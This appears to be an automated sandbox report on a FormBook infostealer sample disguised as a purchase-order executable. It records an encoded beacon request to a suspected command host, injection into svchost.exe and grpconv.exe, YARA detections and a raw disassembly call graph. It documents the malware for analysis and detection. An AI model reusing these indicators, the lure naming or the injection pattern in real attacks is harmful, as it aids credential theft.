                                Data Ascii: 76=N3QPBP0Ca24YTCeB0GPCfHkZa2GUMxDjDLe26nCec8ZDMy/OGyhZiiG8Cmm8hiX8XQk1rjfczWiYeDbwk+woFmowffoaMHPx70TEPzkLSi/HSCh57DpZ4tUGb7fcwWO9L/+cCRUZCfKJnMRz8iljazJxebBrBNGJlPjXxZM9BfTm+szLcmFRqaA/mrFExehhrL5YOYvLNtxHiY/NgfEmKB5EJ5hpdh9BQJ1S/dQAVAlu+t5M9SGQ7LsTYgR9O4QFq3++aITb/awnbbFJXp2bkORszFsz59/LfNReSL791OXtcjfYPVIRIqXpwxEfiI8D7E+axvhsoSLMQ2XnLpE0o5YCCcYqvRDBPAU4xxAkvmDfWbG3Efs+Yhr5AJTFFiyz42B7bCqaoCqNMyjWZh2pthrz6hAemwM+GU+bnCWS1//Vjdn4vrDJCfZy5AEy7AXzfMCVgglwsl404pUWtLhDihzmtu86dupHHvcc72FhRCWWo96Bu9pL7EfwEn8Y8XKjB3gV7TueRbixa8yzr3eeHEAuRX6xNtIerF4cMje9jjyUs7jNE0AcMoBjDX2aKhHQHAfQ5RRUGbwmzKi8/BnEb60BXRAf0TPYXyAKaLM/9RAjqZFfqsOsaQaw0wiy05VJZoGMSQFG0RPwC24FSij3sP/9iQZ1dgq+H/HclPoq0aw9/IlnCH90NkSG+LUBUhTs5CaiSzElVv+woVAVlcRkUMKX4jZgPBE99MQ6wgrHHz+pIhbi2Pi6z+t6WZWsGl62izfZsB1dSvRYWOxu2/YStjx00NhD9fHfbsjB4dNTxvwQdlPgNkcaYBsJ5WBIiyXZu7HVSfbFXigHmBhaArLYWMW9+D4ScAI/BrCGkX5LGE5bK06dFUMAyQIb+m8VsZHRiqEfI+44R3CNUbF//WgDMUHuMMlDt3lhLdY5wG2nLL39docoxEZwDKSLiM1z1fRyJk89Gta2m9INfBk5TBHZ0qBIcMJUz9dPWUKZfVYkpJ2BoLgs1 [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination Port
                                56192.168.2.74976084.32.84.3280
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:40:30.467418909 CEST487OUTGET /8xob/?76=A14vC586VW4zZwTD5W+icFgZA3/gFFWkfN+k13nedPAvAgeoNHQOmzzfD2mClB7mOSU9pQTtzUjUfjrPrdgjVCIgZM4LbXLF8ymXXAVuMS/ObX4kzH9c4ewBdY7tnGrMOo/XDCkVFvSq&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.bodegamayorista.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:40:30.936996937 CEST1236INHTTP/1.1 200 OK
                                Server: hcdn
                                Date: Mon, 23 Sep 2024 12:40:30 GMT
                                Content-Type: text/html
                                Content-Length: 10072
                                Connection: close
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                x-hcdn-request-id: df02236822b7151e5173a067f1408c60-bos-edge1
                                Expires: Mon, 23 Sep 2024 12:40:29 GMT
                                Cache-Control: no-cache
                                Accept-Ranges: bytes
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                Sep 23, 2024 14:40:30.937010050 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                Sep 23, 2024 14:40:30.937016964 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                Sep 23, 2024 14:40:30.937074900 CEST672INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                Sep 23, 2024 14:40:30.937082052 CEST1236INData Raw: 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77
                                Data Ascii: sync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32
                                Sep 23, 2024 14:40:30.937088013 CEST1236INData Raw: 6f 67 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 61 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 65 6d 70 74 79 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61
                                Data Ascii: ogin</a></li></ul></div></div></nav><div class=empty-account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</di
                                Sep 23, 2024 14:40:30.937100887 CEST1236INData Raw: 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 61 72 74 69 63 6c 65 73 2f 31 35 38 33 32 31 34 2d 68 6f 77 2d 74 6f 2d 61 64 64 2d 61 2d 64 6f 6d 61 69 6e 2d 74 6f 2d 6d 79 2d 61 63 63 6f 75 6e 74 2d 68 6f 77 2d 74 6f 2d
                                Data Ascii: upport.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change
                                Sep 23, 2024 14:40:30.937108040 CEST1236INData Raw: 68 2e 66 6c 6f 6f 72 28 72 2f 37 30 30 29 3a 72 3e 3e 31 2c 72 2b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 65 29 2c 74 3d 30 3b 34 35 35 3c 72 3b 74 2b 3d 6f 29 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 33 35 29 3b 72 65 74 75 72 6e 20 4d 61
                                Data Ascii: h.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c
                                Sep 23, 2024 14:40:30.937304974 CEST328INData Raw: 5d 3d 74 5b 64 5d 21 3d 77 5b 64 5d 3b 76 61 72 20 6d 2c 79 3d 5b 5d 3b 66 6f 72 28 68 3d 31 32 38 2c 75 3d 37 32 2c 64 3d 66 3d 30 3b 64 3c 76 3b 2b 2b 64 29 74 5b 64 5d 3c 31 32 38 26 26 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43
                                Data Ascii: ]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math
                                Sep 23, 2024 14:40:30.937310934 CEST760INData Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
                                Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:08:36:19
                                Start date:23/09/2024
                                Path:C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
                                Imagebase:0x400000
                                File size:1'509'575 bytes
                                MD5 hash:4D40B6F064DB9C79D427CA2A2C9B87AE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:2
                                Start time:08:36:27
                                Start date:23/09/2024
                                Path:C:\Windows\SysWOW64\svchost.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
                                Imagebase:0x9f0000
                                File size:46'504 bytes
                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:08:36:33
                                Start date:23/09/2024
                                Path:C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe"
                                Imagebase:0x5b0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:5
                                Start time:08:36:38
                                Start date:23/09/2024
                                Path:C:\Windows\SysWOW64\grpconv.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\grpconv.exe"
                                Imagebase:0x380000
                                File size:40'448 bytes
                                MD5 hash:5A13926732E6D349FD060C072BC7FB74
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:6
                                Start time:08:36:51
                                Start date:23/09/2024
                                Path:C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe"
                                Imagebase:0x5b0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:8
                                Start time:08:37:04
                                Start date:23/09/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff722870000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:3.6%
                                  Dynamic/Decrypted Code Coverage:0.4%
                                  Signature Coverage:9.6%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:35
                                  execution_graph 86123 4002420 86137 4000070 86123->86137 86125 40024f2 86140 4002310 86125->86140 86143 4003520 GetPEB 86137->86143 86139 40006fb 86139->86125 86141 4002319 Sleep 86140->86141 86142 4002327 86141->86142 86144 400354a 86143->86144 86144->86139 86145 4010e0 86148 401100 86145->86148 86147 4010f8 86149 401113 86148->86149 86150 401184 86149->86150 86151 40114c 86149->86151 86153 401120 86149->86153 86181 401182 86149->86181 86186 401250 86150->86186 86154 401151 86151->86154 86155 40119d 86151->86155 86152 40112c 742846C0 86152->86147 86153->86152 86207 401000 Shell_NotifyIconW setSBCS 86153->86207 86157 401219 86154->86157 86158 40115d 86154->86158 86159 42afb4 86155->86159 86164 4011a3 86155->86164 86157->86153 86161 401225 86157->86161 86160 401163 86158->86160 86167 42b01d 86158->86167 86202 40f190 10 API calls 86159->86202 86168 42afe9 86160->86168 86169 40116c 86160->86169 86218 468b0e 74 API calls setSBCS 86161->86218 86164->86153 86165 4011b6 KillTimer 86164->86165 86166 4011db SetTimer RegisterClipboardFormatW 86164->86166 86201 401000 Shell_NotifyIconW setSBCS 86165->86201 86170 401193 86166->86170 86173 401204 CreatePopupMenu 86166->86173 86167->86152 86206 4370f4 52 API calls 86167->86206 86204 40f190 10 API calls 86168->86204 86169->86153 86175 401174 86169->86175 86170->86147 86171 42b04f 86208 40e0c0 86171->86208 86173->86147 86203 45fd57 65 API calls setSBCS 86175->86203 86179 42b00e 86205 401a50 330 API calls 86179->86205 86180 4011c9 PostQuitMessage 86180->86147 86181->86152 86182 42afe4 86182->86170 86185 42afdc 86185->86152 86185->86182 86187 401262 setSBCS 86186->86187 86188 4012e8 86186->86188 86219 401b80 86187->86219 86188->86170 86190 40128c 86191 4012d1 KillTimer SetTimer 86190->86191 86192 4012bb 86190->86192 86193 4272ec 86190->86193 86191->86188 86194 4012c5 86192->86194 86195 42733f 86192->86195 86196 4272f4 Shell_NotifyIconW 86193->86196 86197 42731a Shell_NotifyIconW 86193->86197 86194->86191 86198 427393 Shell_NotifyIconW 86194->86198 86199 427348 Shell_NotifyIconW 86195->86199 86200 42736e Shell_NotifyIconW 86195->86200 86196->86191 86197->86191 86198->86191 86199->86191 86200->86191 86201->86180 86202->86170 86203->86185 86204->86179 86205->86181 86206->86181 86207->86171 86210 40e0e7 setSBCS 86208->86210 86209 40e142 86212 40e184 86209->86212 86317 4341e6 63 API calls __wcsicoll 86209->86317 86210->86209 86211 42729f DestroyCursor 86210->86211 86211->86209 86214 40e1a0 Shell_NotifyIconW 86212->86214 86215 4272db Shell_NotifyIconW 86212->86215 86216 401b80 54 API calls 86214->86216 86217 40e1ba 86216->86217 86217->86181 86218->86182 86220 401b9c 86219->86220 86240 401c7e 86219->86240 86241 4013c0 86220->86241 86223 42722b LoadStringW 86226 427246 86223->86226 86224 401bb9 86246 402160 86224->86246 86260 40e0a0 86226->86260 86227 401bcd 86229 427258 86227->86229 86230 401bda 86227->86230 86264 40d200 52 API calls 2 library calls 86229->86264 86230->86226 86231 401be4 86230->86231 86259 40d200 52 API calls 2 library calls 86231->86259 86234 427267 86235 42727b 86234->86235 86237 401bf3 setSBCS _wcscpy _wcsncpy 86234->86237 86265 40d200 52 API calls 2 library calls 86235->86265 86239 401c62 Shell_NotifyIconW 86237->86239 86238 427289 86239->86240 86240->86190 86266 4115d7 86241->86266 86247 426daa 86246->86247 86248 40216b _wcslen 86246->86248 86304 40c600 86247->86304 86251 402180 86248->86251 86252 40219e 86248->86252 86250 426db5 86250->86227 86303 403bd0 52 API calls ctype 86251->86303 86254 4013a0 52 API calls 86252->86254 86256 4021a5 86254->86256 86255 402187 _memmove 86255->86227 86257 426db7 86256->86257 86258 4115d7 52 API calls 86256->86258 86258->86255 86259->86237 86261 40e0b2 86260->86261 86262 40e0a8 86260->86262 86261->86237 86316 403c30 52 API calls _memmove 86262->86316 86264->86234 86265->86238 86268 4115e1 _malloc 86266->86268 86269 4013e4 86268->86269 86272 4115fd std::exception::exception 86268->86272 86280 4135bb 86268->86280 86277 4013a0 86269->86277 86271 411645 86296 418105 RaiseException 86271->86296 86276 41163b 86272->86276 86294 41130a 51 API calls __cinit 86272->86294 86275 411656 86295 4180af 46 API calls std::exception::operator= 86276->86295 86278 4115d7 52 API calls 86277->86278 86279 4013a7 86278->86279 86279->86223 86279->86224 86281 413638 _malloc 86280->86281 86285 4135c9 _malloc 86280->86285 86302 417f77 46 API calls __getptd_noexit 86281->86302 86282 4135d4 86282->86285 86297 418901 46 API calls __NMSG_WRITE 86282->86297 86298 418752 46 API calls 6 library calls 86282->86298 86299 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86282->86299 86285->86282 86286 4135f7 RtlAllocateHeap 86285->86286 86289 413624 86285->86289 86292 413622 86285->86292 86286->86285 86287 413630 86286->86287 86287->86268 86300 417f77 46 API calls __getptd_noexit 86289->86300 86301 417f77 46 API calls __getptd_noexit 86292->86301 86294->86276 86295->86271 86296->86275 86297->86282 86298->86282 86300->86292 86301->86287 86302->86287 86303->86255 86305 40c619 86304->86305 86306 40c60a 86304->86306 86305->86250 86306->86305 86309 4026f0 86306->86309 86308 426d7a _memmove 86308->86250 86310 426873 86309->86310 86311 4026ff 86309->86311 86312 4013a0 52 API calls 86310->86312 86311->86308 86313 42687b 86312->86313 86314 4115d7 52 API calls 86313->86314 86315 42689e _memmove 86314->86315 86315->86308 86316->86261 86317->86212 86318 40bd20 86319 428194 86318->86319 86320 40bd2d 86318->86320 86322 40bd43 86319->86322 86324 4281bc 86319->86324 86327 4281b2 86319->86327 86321 40bd37 86320->86321 86341 4531b1 85 API calls 5 library calls 86320->86341 86330 40bd50 86321->86330 86340 45e987 86 API calls ctype 86324->86340 86339 40b510 VariantClear 86327->86339 86329 4281ba 86331 426cf1 86330->86331 86332 40bd63 86330->86332 86351 44cde9 52 API calls _memmove 86331->86351 86342 40bd80 86332->86342 86335 426cfc 86337 40e0a0 52 API calls 86335->86337 86336 40bd73 86336->86322 86338 426d02 86337->86338 86339->86329 86340->86320 86341->86321 86343 40bd8e 86342->86343 86350 40bdb7 _memmove 86342->86350 86344 40bded 86343->86344 86345 40bdad 86343->86345 86343->86350 86347 4115d7 52 API calls 86344->86347 86352 402f00 86345->86352 86348 40bdf6 86347->86348 86349 4115d7 52 API calls 86348->86349 86348->86350 86349->86350 86350->86336 86351->86335 86353 402f0c 86352->86353 86354 402f10 86352->86354 86353->86350 86355 4115d7 52 API calls 86354->86355 86356 4268c3 86354->86356 86357 402f51 ctype _memmove 86355->86357 86357->86350 86358 425ba2 86363 40e360 86358->86363 86360 425bb4 86379 41130a 51 API calls __cinit 86360->86379 86362 425bbe 86364 4115d7 52 API calls 86363->86364 86365 40e3ec GetModuleFileNameW 86364->86365 86380 413a0e 86365->86380 86367 40e421 _wcsncat 86383 413a9e 86367->86383 86370 4115d7 52 API calls 86371 40e45e _wcscpy 86370->86371 86386 40bc70 86371->86386 86375 40e4a9 86375->86360 86376 401c90 52 API calls 86378 40e4a1 _wcscat _wcslen _wcsncpy 86376->86378 86377 4115d7 52 API calls 86377->86378 86378->86375 86378->86376 86378->86377 86379->86362 86405 413801 86380->86405 86435 419efd 86383->86435 86387 4115d7 52 API calls 86386->86387 86388 40bc98 86387->86388 86389 4115d7 52 API calls 86388->86389 86390 40bca6 86389->86390 86391 40e4c0 86390->86391 86447 403350 86391->86447 86393 40e4cb RegOpenKeyExW 86394 427190 RegQueryValueExW 86393->86394 86395 40e4eb 86393->86395 86396 4271b0 86394->86396 86397 42721a RegCloseKey 86394->86397 86395->86378 86398 4115d7 52 API calls 86396->86398 86397->86378 86399 4271cb 86398->86399 86454 43652f 52 API calls 86399->86454 86401 4271d8 RegQueryValueExW 86402 4271f7 86401->86402 86404 42720e 86401->86404 86403 402160 52 API calls 86402->86403 86403->86404 86404->86397 86406 41381a 86405->86406 86407 41389e 86405->86407 86406->86407 86418 41388a 86406->86418 86427 419e30 46 API calls __mbstowcs_l_helper 86406->86427 86408 4139e8 86407->86408 86409 413a00 86407->86409 86432 417f77 46 API calls __getptd_noexit 86408->86432 86434 417f77 46 API calls __getptd_noexit 86409->86434 86411 4139ed 86433 417f25 10 API calls __mbstowcs_l_helper 86411->86433 86415 41396c 86415->86407 86416 413967 86415->86416 86419 41397a 86415->86419 86416->86367 86417 413929 86417->86407 86420 413945 86417->86420 86429 419e30 46 API calls __mbstowcs_l_helper 86417->86429 86418->86407 86426 413909 86418->86426 86428 419e30 46 API calls __mbstowcs_l_helper 86418->86428 86431 419e30 46 API calls __mbstowcs_l_helper 86419->86431 86420->86407 86420->86416 86423 41395b 86420->86423 86430 419e30 46 API calls __mbstowcs_l_helper 86423->86430 86426->86415 86426->86417 86427->86418 86428->86426 86429->86420 86430->86416 86431->86416 86432->86411 86433->86416 86434->86416 86436 419f13 86435->86436 86437 419f0e 86435->86437 86444 417f77 46 API calls __getptd_noexit 86436->86444 86437->86436 86440 419f2b 86437->86440 86439 419f18 86445 417f25 10 API calls __mbstowcs_l_helper 86439->86445 86443 40e454 86440->86443 86446 417f77 46 API calls __getptd_noexit 86440->86446 86443->86370 86444->86439 86445->86443 86446->86439 86448 403367 86447->86448 86449 403358 86447->86449 86450 4115d7 52 API calls 86448->86450 86449->86393 86451 403370 86450->86451 86452 4115d7 52 API calls 86451->86452 86453 40339e 86452->86453 86453->86393 86454->86401 86455 416454 86492 416c70 86455->86492 86457 416460 GetStartupInfoW 86458 416474 86457->86458 86493 419d5a HeapCreate 86458->86493 86460 4164cd 86461 4164d8 86460->86461 86577 41642b 46 API calls 3 library calls 86460->86577 86494 417c20 GetModuleHandleW 86461->86494 86464 4164de 86465 4164e9 __RTC_Initialize 86464->86465 86578 41642b 46 API calls 3 library calls 86464->86578 86513 41aaa1 GetStartupInfoW 86465->86513 86469 416503 GetCommandLineW 86526 41f584 GetEnvironmentStringsW 86469->86526 86473 416513 86532 41f4d6 GetModuleFileNameW 86473->86532 86475 41651d 86478 416528 86475->86478 86580 411924 46 API calls 3 library calls 86475->86580 86536 41f2a4 86478->86536 86479 41652e 86480 416539 86479->86480 86581 411924 46 API calls 3 library calls 86479->86581 86550 411703 86480->86550 86483 416541 86485 41654c __wwincmdln 86483->86485 86582 411924 46 API calls 3 library calls 86483->86582 86554 40d6b0 86485->86554 86488 41657c 86584 411906 46 API calls _doexit 86488->86584 86491 416581 _raise 86492->86457 86493->86460 86495 417c34 86494->86495 86496 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86494->86496 86585 4178ff 49 